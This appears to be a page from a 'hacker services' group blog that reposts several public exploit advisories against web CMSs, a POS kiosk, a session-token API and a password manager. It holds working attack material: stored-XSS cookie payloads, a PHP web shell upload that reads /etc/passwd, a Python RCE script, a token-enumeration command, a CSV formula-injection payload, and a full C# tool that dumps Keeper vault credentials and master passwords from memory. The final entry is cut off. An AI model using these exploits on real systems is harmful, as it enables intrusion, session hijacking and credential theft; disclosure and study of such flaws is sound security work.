Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863108711

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2285


Release Date:
=============
2023-07-19


Vulnerability Laboratory ID (VL-ID):
====================================
2285


Common Vulnerability Scoring System:
====================================
5.8


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.


Affected Product(s):
====================
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser
to web-application requests from the application-side.

The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code.
After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins
in the backend (listing).

The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own
malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in
the backend (listing).

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery

Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state

Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open your browser and start a http session tamper
2. Register in the application by login click to register
3. Inject to the marked vulnerable input fields your test payload
4. Save the entry by submit via post method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrong validated context that executes on preview of users
6. The script code executes on preview of the profile - settings
7. Successful reproduce of the first vulnerability!
8. Followup by opening the Delivery address module
9. Add a contact and add in the same vulnerable marked input fields your test payload
Note: T he script code executes on each review of the address in the backend or user frontend
10. Successful reproduce of the second vulnerability!


Exploitation: Payload
"<iframe src=evil.source onload(alert(document.cookie)>
"<iframe src=evil.source onload(alert(document.domain)>


--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin:https://paulprinting.localhost:8000
Connection: keep-alive
Referer:https://paulprinting.localhost:8000/printing/account/setting
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
POST:
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
&zipcode=2342&country=BS&phone=23523515235235&save=Save
-
POST: HTTP/3.0 302 Found
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
location:https://paulprinting.localhost:8000/printing/account/setting?save=1
-
https://paulprinting.localhost:8000/printing/account/setting?save=1
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer:https://paulprinting.localhost:8000/printing/account/setting
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33


Vulnerable Source: Your Account - Settings
<div class="form-group row">
<label class="col-sm-4 col-form-label">First name</label>
<div class="col-sm-8">
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<label class="col-sm-4 col-form-label">Last name</label>
<div class="col-sm-8">
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">Address</label>
<div class="col-sm-8">
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">City</label>
<div class="col-sm-8">
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">State</label>
<div class="col-sm-8">
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>


Vulnerable Source: Deliery Contact (Address)
<table class="table">
<thead>
<tr>
<th>Contact</th>
<th>Address</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
<td></td>
<td class="text-right">
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a>
</td></tr></tbody>
</table>


Security Risk:
==============
The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
HireHackking 
Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2323


Release Date:
=============
2023-07-17


Vulnerability Laboratory ID (VL-ID):
====================================
2323


Common Vulnerability Scoring System:
====================================
7.2


Vulnerability Class:
====================
Privilege Escalation


Current Estimated Price:
========================
3.000€ - 4.000€


Product & Service Introduction:
===============================
KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or
freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.
With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to
manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage:https://aures.com/de/komet/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.


Affected Product(s):
====================
Aures Technologies GmbH
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)


Vulnerability Disclosure Timeline:
==================================
2023-05-09: Researcher Notification & Coordination (Security Researcher)
2023-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal
(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers
to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are
able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security
vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local
privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate
local file-system information of the compromised windows based operating system.

No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system
vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.

Vulnerable Operating System(s):
[+] Windows 10 (IoT Enterprise)

Affected Component(s):
[+] Context Menu

Affected Function(s):
[+] Web Search
[+] Share (Teilen)


Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


PoC: Sheet
Touch Display => Select Food Item => Highlight Text
=> Open Context Menu => Extend Context Menu => Web-Search
=> Browser => Local File System => Compromised!


Manual steps to reproduce the vulnerability ...
01. First touch the monitor display to move on from standby
02. Select an food item from the menu of immergrün (we recomment the cesar wraps)
03. Push the information button of the selected food item
04. Push twice via touch to mark the selected food item text
05. Press a third time after you have marked the context by holding it down on the touch display
06. Now the function context menu of the operating system for highlighted text appears
07. On the context menu appearing 3 dots to extend the visible function menu
08. Select the web-search or share function for the highlighted content in the context menu
09. The browser of the operating system opens on the main front screen
10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)
10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)
10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)
10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols
10.7 Attackers are able to perform man in the middle attacks from the local computer system
11.0 Successful reproduce of the security vulnerability!


Reference(s): Pictures
- 1.png (Terminal A)
- 2.png (Terminal B)
- 3.png (Escape)
- 4.png (Awareness)


Solution - Fix & Patch:
=======================
The security vulnerabilities can be patched by following steps:
1. Disable the content menu to extend
2. Disable the context menu
3. Disable web-search
4. Disable to mark text inputs & texts
5. Disallow to open not white listed websites
6. Disable to download files
7. Restrict the web-browser access
8. Disallow the file browser
9. Disable the browser debug modus
10. Reconfigure the local firewall to allow and disallow connections
11. Change the access permission to prevent exfiltration


Security Risk:
==============
The security risk of the vulnerability in the local booking and payment terminal system is considered high.
The issue can be easily exploited by local attackers with simple interaction via the touch display.
Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse
it for further simple or more complex attack scenarios.


Credits & Authors:
==================
Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther
HireHackking 
Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch Cms
Version: v3.2
Bugs:  RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. login to account as admin
2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. upload poc.phar file

poc.phar file contents :
<?php $a=$_GET['code']; echo system($a);?>

5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd


poc request: 

POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
Connection: close

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceTitle"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream

<?php $a=$_GET['code']; echo system($a);?>

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_field"

1
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_assetID"


------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceBucket"

admin
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="btnsubmit"

Submit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="formaction"

edit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="token"

5494af3e8dbe5ac399ca7f12219cfe82
------WebKitFormBoundaryYGoerZn09hHSjd4Z--
HireHackking 
Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration
Session tokens in RWS WorldServer have a low entropy and can be
enumerated, leading to unauthorised access to user sessions.


Details
=======

Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357


Introduction
============

"WorldServer offers a flexible, enterprise-class translation management
system that automates translation tasks and greatly reduces the cost of
supporting large volumes of local language content."

(from the vendor's homepage)


More Details
============

WorldServer associates user sessions with numerical tokens, which always
are positive values below 2^31. The SOAP action "loginWithToken" allows
for a high amount of parallel attempts to check if a token is valid.
During analysis, many assigned tokens were found to be in the 7-digit
range of values. An attacker is therefore able to enumerate user
accounts in only a few hours.


Proof of Concept
================

In the following an example "loginWithToken" request is shown:

-----------------------------------------------------------------------
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:soapenv="http://schemas.xmlsoap.org">
     <soapenv:Header/>
     <soapenv:Body>
        <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
           <token xsi:type="xsd:string">FUZZ</token>
        </com:loginWithToken>
     </soapenv:Body>
</soapenv:Envelope>
-----------------------------------------------------------------------

It can be saved as file "login-soap.req" and be used as a request
template for the command-line HTTP enumerator monsoon [1] to achieve
many parallel requests:

-----------------------------------------------------------------------
$ monsoon fuzz --threads 100 \
--template-file login-soap.req \
--range 1-2147483647 \
--hide-pattern "InvalidSessionException" \
'https://www.example.com'

Target URL: https://www.example.com/

   status   header     body   value    extract

      500      191      560   5829099
      500      191      556   6229259
      200      191     3702   7545136
      500      191      556   9054984
[...]
processed 12000000 HTTP requests in 2h38m38s
4 of 12000000 requests shown, 1225 req/s
-----------------------------------------------------------------------

The --range parameter reflects the possible value range of 2^31 and for
each value an HTTP request is sent to the WorldServer SOAP API where the
FUZZ marker in the request template is replaced with the respective
value. Also responses are hidden which contain "InvalidSessionException"
as these sessions are invalid. Responses will yield a status code of 200
if an administrative session token is found. For an unprivileged user
session, status code 500 is returned.


Workaround
==========

Lower the rate at which requests can be issued, for example with a
frontend proxy.


Fix
===

According to the vendor, upgrading to versions above 11.8.0 resolves the
vulnerability.


Security Risk
=============

Attackers can efficiently enumerate session tokens. In a penetration
test, it was possible to get access to multiple user accounts, including
administrative accounts using this method in under three hours.
Additionally, by using such an administrative account it seems likely to
be possible to execute arbitrary code on the underlying server by
customising the REST API [2]. Thus, the vulnerability poses a high risk.


Timeline
========

2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already
known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released

References
==========

[1] https://github.com/RedTeamPentesting/monsoon
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
HireHackking 
# Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping
# Google Dork: NA
# Date: 22-07-2023
# Exploit Author: H4rk3nz0
# Vendor Homepage: https://www.keepersecurity.com/en_GB/
# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html
# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4
# Tested on: Windows
# CVE : CVE-2023-36266

using System;
using System.Management;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Collections.Generic;

// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory
// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'
// As a result of this one can extract credentials & master password from a victim after achieving low priv access
// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.
// Github: https://github.com/H4rk3nz0/Peeper

static class Program
{
    // To make sure we are targetting the right child process - check command line
    public static string GetCommandLine(this Process process)
    {
        if (process is null || process.Id < 1)
        {
            return "";
        }
        string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
        using (var searcher = new ManagementObjectSearcher(query))
        using (var collection = searcher.Get())
        {
            var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
            return managementObject != null ? (string)managementObject["CommandLine"] : "";
        }
    }

    //Extract plain text credential JSON strings (regex inelegant but fast)
    public static void extract_credentials(string text)
    {
        int index = text.IndexOf("{\"title\":\"");
        int eindex = text.IndexOf("}");
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();

                int match_cut = match.IndexOf("}  ");
                if (match_cut != -1 )
                {
                    match = match.Substring(0, match_cut + "}  ".Length).TrimEnd();
                    if (!stringsList.Contains(match) && match.Length > 20)
                    {
                        Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "}  ".Length) + "\n");
                        stringsList.Add(match);
                    }

                } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
                {
                    Console.WriteLine("->Credential Record Found : " + match + "\n");
                    stringsList.Add(match.TrimEnd());
                }
                index = text.IndexOf("{\"title\":\"", index + 1);
                eindex = text.IndexOf("}", eindex + 1);
            }
            catch
            {
                return;
            }

        }
    }

    // extract account/email containing JSON string
    public static void extract_account(string text)
    {
        int index = text.IndexOf("{\"expiry\"");
        int eindex = text.IndexOf("}");
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                if ((match.Length > 2))
                {
                    Console.WriteLine("->Account Record Found : " + match + "\n");
                    return;
                }
                index = text.IndexOf("{\"expiry\"", index + 1);
                eindex = text.IndexOf("}", eindex + 1);
            }
            catch
            {
                return;
            }
        }

    }

    // Master password not available with SSO based logins but worth looking for.
    // Disregard other data key entries that seem to match: _not_master_key_example
    public static void extract_master(string text)
    {
        int index = text.IndexOf("data_key");
        int eindex = index + 64;
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(data_key[ -~]+)");
                var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
                if (match_one.Replace("data_key", "").Length > 5)
                {
                    if (!clean.IsMatch(match_one.Replace("data_key", "")))
                    {
                        Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
                    }

                }
                index = text.IndexOf("data_key", index + 1);
                eindex = index + 64;
            }
            catch
            {
                return;
            }

        }
    }

    // Store extracted strings and comapre 
    public static List<string> stringsList = new List<string>();

    // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
    // Performs OpenProcess to get handle with necessary query permissions
    static void Main(string[] args)
    {
        foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
        {
            string commandline = GetCommandLine(process);
            if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
            {
                Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
                Console.WriteLine("->Searching...\n");
                IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
                IntPtr address = new IntPtr(0x10000000000);
                MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
                while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
                {
                    if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
                    {
                        byte[] buffer = new byte[(int)memInfo.RegionSize];
                        if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
                        {
                            string text = Encoding.ASCII.GetString(buffer);
                            extract_credentials(text);
                            extract_master(text);
                            extract_account(text);
                        }
                    }

                    address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
                }

                CloseHandle(processHandle);

            }

        }

    }

    [DllImport("kernel32.dll")]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr hObject);

    [DllImport("ntdll.dll")]
    public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);

    [StructLayout(LayoutKind.Sequential)]
    public struct MEMORY_BASIC_INFORMATION
    {
        public IntPtr BaseAddress;
        public IntPtr AllocationBase;
        public uint AllocationProtect;
        public IntPtr RegionSize;
        public uint State;
        public uint Protect;
        public uint Type;
    }
}
HireHackking 
# Exploit Title: RosarioSIS 10.8.4 - CSV Injection
# Google Dork:NA
# Exploit Author: Ranjeet Jaiswal#
# Vendor Homepage: https://www.rosariosis.org/
# Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip
# Affected Version: 10.8.4
# Category: WebApps
# Tested on: Windows 10
# 
#
# 1. Vendor Description:
#
# RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical   personnel. However, it also adds many components not typically found in Student Information Systems. 
#
# 2. Technical Description:
#
# A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application with version 10.8.4 allows malicious users to execute malicious payload in csv/xls and redirect authorized user to malicious website.

#
# 3. Proof Of Concept:

 3.1. Proof of Concept for CSV injection.

# #Step to reproduce.
Step1:Login in to RosarioSIS 10.8.4
Step2:Go to Periods page
Step3:Add CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")"in the Title field
Step4:click on Save button to save data.
Step5:Go to export tab and export the data
Step6:When user open download Periods.xls file.You will see redirection hyperlink.
Step7:When user click on link ,User will be redirected to Attacker or
malicious website.



# 4. Solution:
 Upgrade to latest release of RosarioSIS.
HireHackking

Perch v3.2 - Stored XSS 

Exploit Title: Perch v3.2 - Stored XSS
Application: Perch Cms
Version: v3.2
Bugs:  XSS
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. login to account
2. go to http://localhost/perch_v3.2/perch/core/settings/
3. upload svg file

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""
4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)
HireHackking 
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog 
#Version: v3.9
#Bugs:  RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date of found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests

#inputs
username=input('username: ')
password=input('password: ')

#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"


#login 
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
    'Cookie' : 'ZsessionLang=en',
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
    }
login_req=session.post(login_url,headers=headers,data=login_data)

if login_req.status_code == 200:
    print('Login OK')
else:
    print('Login promlem.')
    exit()
#payload
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
    }
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)

#rename

rename_req=session.get(rename_url)

#poc
poc_req=session.get(poc_url)
print(poc_req.text)


#youtube poc video - https://youtu.be/nn7hieGyCFs
HireHackking 
# Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS)
# Exploit Author: CraCkEr aka (skalvin)
# Date: 22/07/2023
# Vendor: mooSocial
# Vendor Homepage: https://moodatingscript.com/
# Software Link: https://demo.moodatingscript.com/home
# Version: 1.2
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844



## Greetings

